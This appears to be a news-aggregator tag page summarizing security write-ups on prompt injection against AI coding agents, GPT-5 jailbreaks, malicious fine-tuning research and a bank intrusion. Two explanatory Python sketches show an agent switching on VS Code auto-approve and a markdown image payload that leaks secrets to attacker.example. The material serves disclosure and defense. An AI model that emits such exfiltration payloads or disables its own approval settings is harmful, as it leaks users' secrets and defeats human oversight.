Tag: manipulation

  • Slashdot: Cornell Researchers Develop Invisible Light-Based Watermark To Detect Deepfakes

    Source URL: https://slashdot.org/story/25/08/12/2214243/cornell-researchers-develop-invisible-light-based-watermark-to-detect-deepfakes?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Summary: Researchers at Cornell University have developed an innovative watermarking system based on coded light, enhancing the detection of deepfakes through a method that requires no special hardware. This system offers a more…

  • Embrace The Red: GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773)

    Source URL: https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/
    Source: Embrace The Red
    Summary: This post covers an important, and alarming, prompt injection discovery that leads to full compromise of the developer's machine via GitHub Copilot and VS Code. It is achieved by placing Copilot into YOLO…
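    The mechanism behind this entry is the agent editing its own workspace configuration to disable command approval. A minimal sketch of that write, assuming the experimental `chat.tools.autoApprove` setting key the post describes as "YOLO mode" (the key name is taken from the linked write-up, not from the summary above):

```python
import json
from pathlib import Path

def simulate_settings_poisoning(workspace: Path) -> Path:
    """Sketch of the CVE-2025-53773 mechanism: an injected prompt steers the
    agent into editing the workspace's .vscode/settings.json, flipping an
    auto-approve flag so later tool and shell invocations run unprompted."""
    settings_path = workspace / ".vscode" / "settings.json"
    settings_path.parent.mkdir(parents=True, exist_ok=True)

    # Preserve any existing settings (an attacker would, to stay unnoticed).
    settings = json.loads(settings_path.read_text()) if settings_path.exists() else {}

    # The single write that puts the agent into "YOLO mode".
    settings["chat.tools.autoApprove"] = True
    settings_path.write_text(json.dumps(settings, indent=2))
    return settings_path
```

    The point of the sketch: no exploit code is needed beyond one JSON write inside the workspace the agent already controls, which is why file-write tools plus untrusted input are enough for full compromise.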

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/
    Source: Embrace The Red
    Summary: Another day, another AI data exfiltration exploit. Today we look at OpenHands, formerly known as OpenDevin, created by All-Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…
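    The zero-click channel this entry alludes to works because chat UIs fetch image URLs automatically on render. A toy payload builder illustrates the idea; the sink domain and query parameter here are hypothetical, not taken from the post:

```python
from urllib.parse import parse_qs, quote, urlsplit

def exfil_image_markdown(secret: str, sink: str = "https://attacker.example/log") -> str:
    """Build the kind of markdown an injected prompt asks the agent to emit:
    when the chat UI renders the image, it issues a GET to the attacker's
    server with the secret smuggled into the query string -- no click needed."""
    return f"![status]({sink}?d={quote(secret)})"

def leaked_value(markdown: str) -> str:
    """What the attacker's server recovers from the request it receives."""
    url = markdown[markdown.index("(") + 1 : markdown.rindex(")")]
    return parse_qs(urlsplit(url).query)["d"][0]
```

    The common mitigation is exactly what this shape suggests: render images only from an allow-listed set of domains, so the agent cannot be steered into dialing out to arbitrary hosts.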

  • Slashdot: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise

    Source URL: https://it.slashdot.org/story/25/08/08/2113251/red-teams-jailbreak-gpt-5-with-ease-warn-its-nearly-unusable-for-enterprise?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Summary: The text highlights significant security vulnerabilities in the newly released GPT-5 model, noting that it was easily jailbroken within a short timeframe. The results from different red teaming efforts…

  • The Register: Infosec hounds spot prompt injection vuln in Google Gemini apps

    Source URL: https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/
    Source: The Register
    Summary: Not a very smart home: crims could hijack a smart-home boiler, open and close powered windows, and more. Now fixed. Black Hat: A trio of researchers has disclosed a major prompt injection vulnerability in Google's Gemini large…

  • Embrace The Red: How Devin AI Can Leak Your Secrets Via Multiple Means

    Source URL: https://embracethered.com/blog/posts/2025/devin-can-leak-your-secrets/
    Source: Embrace The Red
    Summary: In this post we show how an attacker can make Devin send sensitive information to third-party servers via multiple means. This post assumes that you have read the first post about Devin as well. But here…

  • OpenAI: Estimating worst case frontier risks of open weight LLMs

    Source URL: https://openai.com/index/estimating-worst-case-frontier-risks-of-open-weight-llms
    Source: OpenAI
    Summary: In this paper, we study the worst-case frontier risks of releasing gpt-oss. We introduce malicious fine-tuning (MFT), where we attempt to elicit maximum capabilities by fine-tuning gpt-oss to be as capable as possible in two domains: biology and…

  • Embrace The Red: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed

    Source URL: https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/
    Source: Embrace The Red
    Summary: Sandbox-escape-style attacks can happen when an AI is able to modify its own configuration settings, such as by writing to configuration files. That was the case with Amp, an agentic coding tool built by Sourcegraph. The…

  • Slashdot: In Search of Riches, Hackers Plant 4G-Enabled Raspberry Pi In Bank Network

    Source URL: https://it.slashdot.org/story/25/07/31/2241259/in-search-of-riches-hackers-plant-4g-enabled-raspberry-pi-in-bank-network?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Summary: The text highlights a sophisticated cyber-physical attack by the group UNC2891, which involved planting a 4G-enabled Raspberry Pi within a bank's ATM network. Utilizing advanced malware and techniques for…